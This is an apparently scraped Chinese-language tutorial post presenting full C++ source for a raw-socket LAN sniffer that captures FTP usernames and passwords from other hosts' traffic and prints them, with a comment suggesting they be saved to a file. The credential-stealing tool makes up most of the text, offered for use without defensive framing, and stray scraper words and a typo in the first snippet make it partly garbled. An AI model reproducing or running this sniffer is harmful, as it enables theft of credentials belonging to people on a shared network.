偵聽局域網內密碼

只需在前面的網絡嗅探程序基礎上,添加對搜索出的端口號進行的增長功能便可:api

代碼以下:網絡

在DecodeIPPacket中添加:socket

switch(::ntohs(pTCPHdr->destinationPort)) { case 21: { GetFtp((char*)pTCPHdr+sizeof(TCPHeader),pIPHdr->ipDestination); } break; case 80: case 8080: break; }

 

void GetFtp(char *pData.DWORD dwDestIp) { char szBuf[256]; static char szUserName[21]; static char szPassword[21]; if(strnicmp(pData,"USER",5)==0) { sscanf(pData+4,"%*[]%s",szUserName); } else if(strnicmp(pData,"PASS",5)==0) { sscanf(pData+4,"%*[]%s",szPassword); wsprintf(szBuf,"Server Address:%s;User Name:%s;Password:%s;\n\n",::inet_ntoa(*(in_addr*)&dwDestIp),szUserName,szPassword); printf(szBuf); } }

完整程序以下:tcp

/////////////////////////////////////////////////
// PasswordMonitor.cpp文件
 #include "../common/initsock.h" #include "../common/protoinfo.h" #include <stdio.h> #include <mstcpip.h>

#pragma comment(lib, "Advapi32.lib") CInitSock theSock; void GetFtp(char *pData, DWORD dwDestIp) { char szBuf[256]; static char szUserName[21]; static char szPassword[21]; if(strnicmp(pData, "USER ", 5) == 0) { sscanf(pData + 4, "%*[ ]%s", szUserName); } else if(strnicmp(pData, "PASS ", 5) == 0) { sscanf(pData + 4, "%*[ ]%s", szPassword); wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n", ::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword); printf(szBuf); // 這裏您能夠將它保存到文件中
 } } void DecodeIPPacket(char *pData) { IPHeader *pIPHdr = (IPHeader*)pData; int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG); switch(pIPHdr->ipProtocol) { case IPPROTO_TCP: { TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen); switch(::ntohs(pTCPHdr->destinationPort)) { case 21:    // ftp協議
 { GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination); } break; case 80:    // http協議...
            case 8080: break; } } break; case IPPROTO_UDP: break; case IPPROTO_ICMP: break; } } void main() { // 建立原始套節字
    SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP); // 獲取本地IP地址
    char szHostName[56]; SOCKADDR_IN addr_in; struct  hostent *pHost; gethostname(szHostName, 56); if((pHost = gethostbyname((char*)szHostName)) == NULL) return ; // 在調用ioctl以前,套節字必須綁定
    addr_in.sin_family  = AF_INET; addr_in.sin_port = htons(0); memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length); printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr)); if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) return; // 設置SIO_RCVALL控制代碼,以便接收全部的IP包 
    DWORD dwValue = 1; if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0) return ; // 開始接收封包
    printf(" \n\n begin to monitor ftp password... \n\n"); char buff[1024]; int nRet; while(TRUE) { nRet = recv(sRaw, buff, 1024, 0); if(nRet > 0) { DecodeIPPacket(buff); } } closesocket(sRaw); }

執行結果:spa

相關文章
相關標籤/搜索